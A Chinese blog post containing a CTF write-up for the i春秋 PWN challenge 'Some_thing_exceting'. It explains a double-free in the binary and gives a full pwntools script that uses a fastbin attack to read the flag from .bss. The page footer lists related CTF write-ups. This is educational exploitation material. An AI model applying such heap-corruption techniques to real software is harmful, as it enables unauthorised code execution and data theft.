i春秋新春战役PWN之Some_thing_exceting

最新推荐文章于 2023-09-19 10:14:14 发布
最新推荐文章于 2023-09-19 10:14:14 发布
阅读量689 收藏
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43935969/article/details/104756082
版权

心好累,堆处入手,看明白了,可是总是复盘实现不了。。。不过学长那边可以,是我机子的问题??

题目链接:https://pan.baidu.com/s/1Tv5Y4ieNVEasZ8oAYYn2Lw   提取码:5td6

 

文件查看一下

 

拿到程序发现运行不了,查看文件属性,发现没有执行权限,加一个执行权限

执行不了

因为程序要打开/flag(根目录下flag)文件

没有就自动退出了,所以创建

 

 

程序主要有三个功能,增加、删除、查看

 

delete函数中,指针使用完没有置0,所以存在uaf和double free漏洞

 

程序一开始运行时候,flag就已经读入程序,在s中,位置在bss段

而且,flag这里刚好为我们预留了一个大小为0x60的块,所以我们应该利用double free申请到这块内存,然后show()输出即可

 

总结思路(error404的ppt):

1.首先一次free掉chunk1、chunk2、chunk1,每个chunk的大小均为0x50

2.写入chunk1的fd指针为0x6020A8(flag的位置)

3.将0x6020A8处作为chunk的data域分配出来(因为程序unuse的fd指针在inuse的时候就是data域,是复用内存了)

4.利用show函数打印出flag

//exp
#coding:utf-8
from pwn import *
import sys
p = process('./excited')
context.arch='amd64'
libc=ELF("./excited").libc

def new(size1,content1,size2,content2):
    p.recvuntil('> Now please tell me what you want to do :')
    p.sendline('1')
    p.recvuntil('length : ')
    p.sendline(str(size1))
    p.recvuntil('> ba : ')
    p.send(content1)
    p.recvuntil('length : ')
    p.sendline(str(size2))
    p.recvuntil('> na : ')
    p.send(content2)

def delete(idx):
    p.recvuntil(' Now please tell me what you want to do :')
    p.sendline('3')
    p.recvuntil(' ID : ')
    p.sendline(str(idx))

def show(idx):
    p.recvuntil('ow please tell me what you want to do :')
    p.sendline('4')
    p.recvuntil('ID : ')
    p.sendline(str(idx))

new(0x50,'Chunk_1',0x50,'Chunk_2')#0
new(0x50,'Chunk_3',0x50,'Chunk_4')#1
delete(0)
delete(1)
delete(0)
new(0x50,p64(0x602098),0x50,'Chunk_2')#2
new(0x50,'Chunk_3',0x50,'Chunk_4')#3
new(0x50,'f',0x60,'2')#4
show(4)
p.interactive()
p.close()

参考博客:

(1)https://www.anquanke.com/post/id/199540#h2-16

(2)https://nocbtm.github.io/2020/02/22/2020-i%E6%98%A5%E7%A7%8B%E5%85%AC%E7%9B%8A%E8%B5%9Bpwn-writeup/#Some-thing-exceting

(3)https://xz.aliyun.com/t/7281

再次做这题,,,easy,TAT,以前不懂环境哇,,,

做这题,,,

1.思路,只要将块申请到0x6020a0的地方,打印即可

2.free不干净,存在double free,故可以free(0) -> free(1) -> free(0),然后重新申请回来,则修改chunk2的时候,再申请chunk4就是想要的地址。

书文的学习记录本
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
[BUUCTF]PWN——gyctf_2020_some_thing_exceting
mcmuyanga的博客
01-22 808
gyctf_2020_some_thing_exceting 附件 步骤: 例行检查,64位程序,除了PIE,其他保护全开 本地试运行一下,看看大概的情况 64位ida载入,检索字符串的时候发现了有关flag的信息,由于我本地上没有创建flag文件,所以一开始输出了12行的puts 创建了一个flag,在执行,可以看到经典的堆的菜单 main(),程序主要有3个功能add,delete和show add() delete() show() 利用思路 程序一开始就读入了fl
gyctf_2020_some_thing_exceting
z1r0的博客
01-20 373
gyctf_2020_some_thing_exceting 查看保护 有uaf flag被存放在了bss段。 放flag的这里的size大小是0x60,在2.23下会检查size的大小是否与fastbin 对应的大小一样。 所以进行fastbin释放时,申请的堆块为0x50即可。fastbin double free attack即可。最后申请0x40的原因是因为0x50对应的fastbin里double free之后会有东西,所以申请其它大小的堆块。 from pwn import * con
XCTF(攻防世界)—进阶web题Write Up(一)
Lemon's blog
08-20 1701
前言:这段时间做了一些XCTF的web进阶题,真的是学习到了很多知识,就来总结一下。 Cat 一开始以为是命令注入,恰好最近学习了命令注入,就先来测试一下: 输入127.0.0.1,发现是可以ping通的 输入127.0.0.1 | phpinfo() 或127.0.0.1 & net user就会显示: Invalid URL 看来命令注入的方法是行不通的(其他连接符也被过滤了,如...
【buuctf】gyctf_2020_some_thing_exceting
weixin_51055545的博客
07-22 332
主函数开始时,调用函数,将flag文件打开,注意是在根目录下的flag,然后将flag读到全局变量s处,这个0x60很有帮助,构成了一个堆头;程序申请的0x10的堆块起到了存放指针的作用,很正常的堆布局,直接doublefree,去改指针;64位程序,关闭了pie保护,直接放到ida分析;这里注意要劫持的堆地址为s-0x10,此时;连续申请两次,再show,即可读出flag.将堆块释放后,未将指针置空,存在uaf;先申请2个查看堆布局;漏洞点在删除功能处,...
攻防世界-入门12-Writeup
weixin_47848880的博客
02-08 265
攻防世界入门Writeup
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
攻防世界 pwn进阶区解法 write up(一)
qq_46441427的博客
03-01 387
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
攻防世界Misc新手练习区WriteUp大全
D-R0s1的博客
09-02 4058
0x01 写这篇博客的目的 对于CTF中的Misc来说,做题经验显得十分重要,而做题经验的获得很大一部分取决于刷题量。为了避免大家在刷题过程到处搜WriteUp浪费时间,现在把我的一些做题方法分享出来,希望对大家有帮助。当然,大家有更好的解决方法欢迎在评论区留言,互相学习,共同进步。 0x02 解题过程 1. this is flag 点开这个题目直接显示flag 2.ext3 a.把文件放进虚拟...
【攻防世界】web新手题知识点WriteUP及知识点讲解(超超超详细)
最新发布
qq_62604985的博客
09-19 1079
在url处进入 /robots.txt 查看到以下页面。尝试访问fl0g.php文件得到flag。
攻防世界writeup——Web(持续更新)
Lethe's Blog
08-12 8180
lottery(XCTF 4th-QCTF-2018) 打开题目先注册,然后发现flag可以购买。但得先去买彩票赢得足够的钱,七位数字的彩票,猜中的位数越多,赢得的钱越多,因此应该在买彩票这里出了一些漏洞。 1、首先访问目录robots.txt,存在.git泄露。 2、利用工具GitHack,得到网站源码: 3、进行代码审计,问题出现在api.php里的buy函数,这个函数就是用来判断是否猜...
从gyctf_2020_some_thing_exceting复习double free机制(glibc-2.23源码分析向
Tw0的博客
02-10 161
当我们进行double free攻击的时候,如果有一个管理堆块存储着多个下级chunk的指针,那么需要特别注意和管理chunk同样大小的chunk的申请和释放,因为free fastbin chunk的时候,会对其fd指针进行修改,从而导致程序寻找的堆块出现偏差。
ctf攻防世界练习题writeup(第一部分)
Ohh24的博客
09-01 1051
view source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 用火狐浏览器打开对应网站 发现无法找到对应的flag,此时可以按F12寻找相应的flag 同时,根据题目的提示,也可以搜索view-source:http://相应的网站/进行访问,寻找flag get_post 先用火狐打开相应的网站搜索 根据提示用get方式提交名为a,值为1的变量,...
BUUCTF刷题6
m0_51251108的博客
11-03 431
题目:gyctf_2020_some_thing_exceting:mrctf2020_shellcode_revenge:axb_2019_brop64:inndy_echo:wustctf2020_name_your_cat:wdb2018_guess:oneshot_tjctf_2016:zctf2016_note2:ciscn_2019_final_2:wustctf2020_number_game: gyctf_2020_some_thing_exceting: 这题存在uaf漏洞 程序开始时读入
pwn入门小技巧
qq_36918532的博客
05-24 2739
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
XCTF攻防世界进阶区writeup(1-5)
stepone4ward的博客
07-04 1277
1. isc-06 进入题目后看到url后存在参数id,尝试各种注入方式后均无果,使用bp对id参数进行爆破后得到flag。 2.NewsCenter 对search参数进行bool类型的盲注 import requests s=requests.session() url="http://111.198.29.45:38153/index.php" key='' for i in range(1...
Linux pwn零基础入门教程:环境配置到实战攻击
"i春秋月刊第六期的主题深入探讨了Linux pwn(Privilege Escalation,权限提升)的零基础入门教程。该系列由Tangerine@SAINTSEC作者撰写,历时三个月精心编撰,旨在解决新手在Linux环境下攻破安全挑战时遇到的难题,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

书文的学习记录本

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值